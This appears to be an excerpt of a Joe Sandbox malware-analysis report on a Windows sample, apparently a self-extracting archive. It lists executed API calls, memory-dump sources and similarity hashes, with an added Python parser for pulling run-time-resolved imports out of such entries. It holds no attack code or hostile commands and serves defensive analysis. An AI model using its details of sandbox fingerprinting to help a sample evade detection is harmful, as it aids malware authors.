• Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
• Instruction Fuzzy Hash: 48110D71580B05EBED20B7B5CD07FCB7BACFF05B04F484C25B2ADE6092DA66A5068752
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0088E669,0088E5CC,0088E86D), ref: 0088E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0088E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0088E630
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: 667f669f3a3d60f743164dbf9a2c30c8a39f831aa7230ba5a6dbeeeaa3f45411
• Instruction ID: bbda850a8f2d3d022db00abf64ff309836f0f7e2d5d08c3c77c277292d37c195
• Opcode Fuzzy Hash: 667f669f3a3d60f743164dbf9a2c30c8a39f831aa7230ba5a6dbeeeaa3f45411
• Instruction Fuzzy Hash: 62F0F031B91A22AB6F31EFF45C88A6663C8FF36745304063AE902D3610FB24CC94DB90
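The function entries above follow one fixed layout (an "APIs" list of `Name.MODULE(args), ref: ADDR` lines, optionally nested under "Part of subcall function", then a "Similarity" block of IDs and fuzzy hashes). When an analyst wants to pivot across many such entries, for example to list every symbol the sample resolves through GetProcAddress instead of its import table, as the entry directly above does for AcquireSRWLockExclusive and ReleaseSRWLockExclusive, a small parser over the report text is the practical tool. The parser below is an added example and is not code from the Joe Sandbox report or from Joe Security; its SAMPLE text is constructed from two of the entries on this page with the layout whitespace trimmed, and the record and helper names (ApiCall, FunctionEntry, resolved_imports, parse_entries) are this example's own.

```python
"""Parse Joe Sandbox per-function entries ("APIs" / "Similarity" blocks) into records.

Added example; not code from the Joe Sandbox report or from Joe Security.
SAMPLE is constructed from two entries in this report (the GetProcAddress entry
and the _free entry). Record and helper names are this example's own.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0088E669,0088E5CC,0088E86D), ref: 0088E605
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0088E61B
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0088E630
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: 667f669f3a3d60f743164dbf9a2c30c8a39f831aa7230ba5a6dbeeeaa3f45411
APIs
  • Part of subcall function 0089C868: _free.LIBCMT ref: 0089C891
• _free.LIBCMT ref: 0089C8F2
  • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000), ref: 00898DE2
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE,
# optional "(args)", then "ref: ADDR". Matches both "• _free.LIBCMT ref: 0089C8F2"
# and "• GetProcAddress.KERNEL32(00000000,Name), ref: 0088E61B".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Similarity-section fields that identify a function across reports.
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address in the dump
    subcall_of: Optional[int]   # callee address when the call is reached via a subcall


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def resolved_imports(self) -> List[str]:
        """Symbol names passed to GetProcAddress: resolved at run time, so they are
        absent from a static import-table listing."""
        names = []
        for call in self.apis:
            if call.name == "GetProcAddress" and len(call.args) >= 2:
                sym = call.args[1]
                if not re.fullmatch(r"[0-9A-Fa-f]{8}|\?", sym):  # skip addresses / unknowns
                    names.append(sym)
        return names


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split report text into one FunctionEntry per "APIs" heading."""
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every function entry opens with this heading
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            cur.apis.append(ApiCall(
                name=m.group("name"), module=m.group("mod"),
                args=raw.split(",") if raw is not None else [],
                ref=int(m.group("ref"), 16),
                subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m.group("key")] = m.group("val").strip()
    return entries


def all_resolved_imports(entries: List[FunctionEntry]) -> List[str]:
    """Deduplicated, sorted run-time-resolved symbols across all entries."""
    return sorted({s for e in entries for s in e.resolved_imports()})


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.fields.get("API ID"), [c.name for c in e.apis], e.resolved_imports())
```

Run it against the full "Executed Functions" text of a report to get a per-function list of dynamically resolved names and the "API String ID" values, which stay stable across rebuilds and so are a convenient key for matching the same function in other reports of the same family. Here the two names resolved are the SRW lock exports the Visual C++ runtime looks up when it starts, so they are noise for this sample; the same walk over a loader stub typically surfaces the names worth attention.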
APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 008814C2
  • Part of subcall function 0087B146: GetVersionExW.KERNEL32(?), ref: 0087B16B
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008814E6
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00881500
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00881513
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00881523
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00881533
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                                                                                    • Opcode ID: 392c4beb25e8e1a75e9ebfb7a1189cf54cad9a36d89b3ca83dac927c4c00bcfc
                                                                                                                                                                                                    • Instruction ID: d2dbc735a81e08b20e13fd3cb37f2e1f6edda4757ca6231b4c8720b84a1ef318
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 392c4beb25e8e1a75e9ebfb7a1189cf54cad9a36d89b3ca83dac927c4c00bcfc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C31F875108305ABC700DFA8C88499BB7F8FF99714F004A1EF999C3610E734D509CBA6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00892AF1,008902FC,0088FA34), ref: 00892B08
                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00892B16
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00892B2F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00892AF1,008902FC,0088FA34), ref: 00892B81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                    • Opcode ID: fbe96abd3bb8ccb5c1c7ae579ea3ac2cc19ccd4b2dd8166e69a6e1e9983bc4ed
                                                                                                                                                                                                    • Instruction ID: 488f71f49338013e34228ee23fb631db78bde2fb442217a6a3463b42e0f6209a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbe96abd3bb8ccb5c1c7ae579ea3ac2cc19ccd4b2dd8166e69a6e1e9983bc4ed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201A23221A712BEBE243B787C95A2A2BD9FF537B4B680B3AF510D58E0EF115D009645
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,008B1098,00894674,008B1098,?,?,008940EF,?,?,008B1098), ref: 008997E9
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089981C
                                                                                                                                                                                                    • _free.LIBCMT ref: 00899844
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 00899851
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 0089985D
                                                                                                                                                                                                    • _abort.LIBCMT ref: 00899863
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                    • Opcode ID: 996dfa444da55b09e0d35fb6efb2b9e0a0714c315faea888b741df244baf1d0c
                                                                                                                                                                                                    • Instruction ID: 3dac859f187f0ac8ea031646a0f79ec13e682698a74a6a17d49cc1db17c900cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 996dfa444da55b09e0d35fb6efb2b9e0a0714c315faea888b741df244baf1d0c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68F0A435140A0266DE12332C7C0AA1B2A69FFD3771F2C013CF555E2692FE2588018567
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
                                                                                                                                                                                                      • Part of subcall function 0087B92D: _wcsrchr.LIBVCRUNTIME ref: 0087B944
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087C197
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087C1DF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                                                                                                    • Opcode ID: 9350be1749e9bcb0f2b86f974efb422370eeb9d6b2b2ef99fda86103e922423c
                                                                                                                                                                                                    • Instruction ID: 7c8c6d3af09fbaa14f279f94c0a1ea18340cad1e17839d89d68f68f594b69337
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9350be1749e9bcb0f2b86f974efb422370eeb9d6b2b2ef99fda86103e922423c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13416A2254071595D732BF788802A7BB3A8FF42704F14851EF99AEB186EB50CDC2C3A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0088CE9D
                                                                                                                                                                                                      • Part of subcall function 0087B690: _wcslen.LIBCMT ref: 0087B696
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088CED1
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,008B946A), ref: 0088CEF1
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088CFFE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: %s%s%u
                                                                                                                                                                                                    • API String ID: 110358324-1360425832
                                                                                                                                                                                                    • Opcode ID: 7279762a518420310cea74244a29fdd7594c28ee983f87dab5b5ae57fa65daf9
                                                                                                                                                                                                    • Instruction ID: 1728481fa9723abb0c98f2ae7c373cc0cb4bdd8f8933cf72501187684da36c43
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7279762a518420310cea74244a29fdd7594c28ee983f87dab5b5ae57fa65daf9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F415071900659AADF25EBA4CC45AEA77BCFB05340F4080A6FA09E7181EF749A44CF76
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087BB27
                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0087A275,?,?,00000800,?,0087A23A,?,0087755C), ref: 0087BBC5
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087BC3B
                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                                                                                                    • String ID: UNC$\\?\
                                                                                                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                                                                                                    • Opcode ID: eddb1a4662462e863a16e8c961b8abf7a8baa1ae739edba07c2a8eab35da31cf
                                                                                                                                                                                                    • Instruction ID: 658f098d175ac5617b5c25b1e17d2233ad5d9f99d9220587a15d69f78d2b6dc7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eddb1a4662462e863a16e8c961b8abf7a8baa1ae739edba07c2a8eab35da31cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C441B131400219AADF22AF64CC41FEB77AAFF92394F14C425F818E7159EB74DA948B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0088B6ED
                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0088B712
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0088B744
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0088B767
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0088B73D,00000066), ref: 0088A6D5
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A6EC
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: LoadResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A703
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: LockResource.KERNEL32(00000000,?,?,?,0088B73D,00000066), ref: 0088A712
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0088B73D,00000066), ref: 0088A72D
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalLock.KERNEL32(00000000), ref: 0088A73E
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0088A762
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0088A7A7
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0088A7C6
                                                                                                                                                                                                      • Part of subcall function 0088A6C2: GlobalFree.KERNEL32(00000000), ref: 0088A7CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                    • String ID: ]
                                                                                                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                                                                                                    • Opcode ID: 4d7ccbd83776f8e257d0c632fb1760e3d30ecb0b4756b332175be39408c077cd
                                                                                                                                                                                                    • Instruction ID: a327e273502ccf7357204e2318e2f21fa2e9747d4a1b74444cbf14fce4d8522c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d7ccbd83776f8e257d0c632fb1760e3d30ecb0b4756b332175be39408c077cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6701AD3654060567E71277B89C49A6F7BB9FBC0B62F180122B900E7295EB21CD0947A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0088D64B
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0088D661
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0088D675
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0088D684
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: RENAMEDLG
                                                                                                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                                                                                                    • Opcode ID: f90cfef47adc16805de4a5f2834143e50360a04372f2337d45cd0f3b828489ee
                                                                                                                                                                                                    • Instruction ID: f170fc7e8b5e45e1a6b831453f06b7008e4896f5b6fc638c524f5b7587354885
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90cfef47adc16805de4a5f2834143e50360a04372f2337d45cd0f3b828489ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04012833385718BAE220AF689D09F5B776EFB6AB01F014111F705E20D1D7A69A048BB6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00897E24,?,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002), ref: 00897E93
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00897EA6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00897E24,?,?,00897DC4,?,008AC300,0000000C,00897F1B,?,00000002,00000000), ref: 00897EC9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                    • Opcode ID: c1e5c766662dc2baa045cad98ea4c6da33b33396e075e65b9870b0e4a78acc11
                                                                                                                                                                                                    • Instruction ID: b93f6c274c61d221ad11a663609180036bc50cec982b50e8357e18599b0b6e4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1e5c766662dc2baa045cad98ea4c6da33b33396e075e65b9870b0e4a78acc11
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73F06231A14208BBEF11AFA4DC09B9EBFB5FF45711F0840A9F805E2660DB349E40CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0088081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
                                                                                                                                                                                                      • Part of subcall function 0088081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087F2E4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(008B81C8,CryptUnprotectMemory), ref: 0087F2F4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                                                                                                    • Opcode ID: f89e2818669ccf1ca7152a05a4300cf171bcf102c1e054470601b33f63c591bd
                                                                                                                                                                                                    • Instruction ID: 4cb06500e4a21b57d875cff26da6ce85aa2fcedbfdf5b03e77d0a76d5bf2b0b3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f89e2818669ccf1ca7152a05a4300cf171bcf102c1e054470601b33f63c591bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03E08670910F219EE7209FB9984DB01BAD4FF06710F14C82DF0EAD3B45D6B8E5808B50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2252061734-0
                                                                                                                                                                                                    • Opcode ID: c889be747ac3f63b08bf5d4d0c31d22b89293e2fd5ff83ae0d67ca508541e29a
                                                                                                                                                                                                    • Instruction ID: 7ff5c7abd3c3d096051882bb0f7dbc10a252bb209e767e30a61b66b822c68145
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c889be747ac3f63b08bf5d4d0c31d22b89293e2fd5ff83ae0d67ca508541e29a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D951E17160021ABFDF29AF58D845BAA73A4FF14318F2C412DE802C76A2D731ED40DB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0089BF39
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0089BF5C
                                                                                                                                                                                                      • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
